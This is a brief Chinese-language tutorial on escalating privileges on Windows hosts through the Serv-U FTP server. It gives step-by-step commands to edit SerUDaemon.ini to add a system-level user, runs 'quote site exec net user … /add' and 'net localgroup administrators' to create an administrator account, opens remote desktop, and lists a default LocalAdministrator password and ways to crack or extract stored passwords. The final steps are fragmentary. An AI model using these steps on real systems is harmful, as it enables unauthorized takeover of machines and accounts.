Serv-U FTP Server,是一種被廣泛運用的FTP服務器端軟件,支持3x/9x/ME/NT/2K等全Windows系列。可以設定多個FTP服務器、限定登錄用戶的權限、登錄主目錄及空間大小等
Serv-U提權分兩種
1.有修改權限
2.無權限修改
第一種情況時
0.判斷是否安裝serv-u
serv-u的默認端口是43958 可以用nmap 掃描確認
1.檢查是否有可寫權限
一般安裝目錄 c:\Program Files\Serv-u\SerUDaemon.ini
打開配置文件
2.增加用戶
在user4=添加一個系統用戶
復制一個 修改名字
password 密碼格式 是 gw+md5 我從https://www.cmd5.com/ 把gw123456 加密 注意gw是他的 鹽 屬於密碼規則
把加密完的密碼去替換復制的密碼 password=gw+md5(gw123456)
maintenance=system 是代表系統權限 user=你命名的用戶
cmd訪問 ftp 連接 ip 輸入你剛剛添加的用戶密碼
輸入
quote site exec net user username password /add
quote site exec net localgroup administrators username /add
利用ftp命令quote site exec 添加用戶 加入administrators 權限組
打開3389連接
第二種情況無修改權限
1.利用md5 直接去解密(ini 文件密碼在ftp連)
2.默認密碼,默認用戶
賬戶:LocalAdministrator ,密碼:#l@$ak#.lk;0@P
命令cmd /c net user DisKill /add & net localgroup administrators DisKill /add
3.不是默認密碼時 直接把SerUAdmin.exe 下載下來 進行查看密碼
直接
記住這里選an字符串
. 后面就是密碼 把它替換到
這也叫溢出提權
至此常用的方式都已經說了。